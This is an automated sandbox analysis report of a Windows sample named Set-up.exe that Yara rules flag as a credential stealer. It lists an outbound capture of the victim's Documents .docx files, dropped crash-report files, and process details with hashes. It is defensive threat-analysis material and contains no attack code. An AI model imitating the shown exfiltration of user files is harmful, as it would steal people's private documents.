May 10, 2025 08:05:51.665410995 CEST	1055	OUT	Data Raw: 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 41 46 57 41 41 46 52 58 4b 4f 2f 41 46 57 41 41 46 52 58 4b 4f 2e 64 6f 63 78 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 95 fa 9e d0 02 04 00 00 02 04 00 00 27 00 00 00 00 Data Ascii: /Users/user/Documents/AFWAAFRXKO/AFWAAFRXKO.docxPK\d!R'g/Users/user/Documents/AFWAAFRXKO.docxPK\d!R2g/Users/user/Documents/MNULNCRIYC/MNULNCRIYC.docxPK\
May 10, 2025 08:05:51.971762896 CEST	702	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:51 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7asmikCpMWLXommg91BH9wnjhHwysiFaQjIQpJ0VpFQyn7OYySTTYG%2Fe3FbeDUIsJQvEJxLjdtaDNuUuqQ5tZ07aFEQdP0nJW8yh4zAuCZvqIO5rpBjfFJ7t7zW%2Bv9OzQII"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f4d7ee87867-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141355&min_rtt=141355&rtt_var=70677&sent=5&recv=13&lost=0&retrans=0&sent_bytes=0&recv_bytes=14635&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_4bbfac33-b74e-4b75-8964-52e4937cc66a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_ae4f23fe-4453-4c08-8e49-5ec9a4d99431\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_da2a02b0-90a6-4a28-9c90-2e5bef4746ea\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_5409b9b5-c318-4fb1-b93f-79ad37fbd536\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_8e7d8957-4f25-4f86-92ca-b4478f3aa501\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_b0903a45-bedb-4fc8-8d02-4a5e159b6a4a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D82.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DE1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E5F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER416A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER419A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4208.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER502F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER506F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER509F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5281.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER52EF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5458.tmp.xml

Windows Analysis Report
Set-up.exe

Target ID:	0
Start time:	02:05:20
Start date:	10/05/2025
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x400000
File size:	25'181'696 bytes
MD5 hash:	93704DCB189997351EC039C6E5F1AA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1236851204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	02:05:35
Start date:	10/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	02:05:36
Start date:	10/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	02:05:37
Start date:	10/05/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7260 -s 92
Imagebase:	0x7ff7d2470000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	15
Start time:	02:05:41
Start date:	10/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	20
Start time:	02:05:46
Start date:	10/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true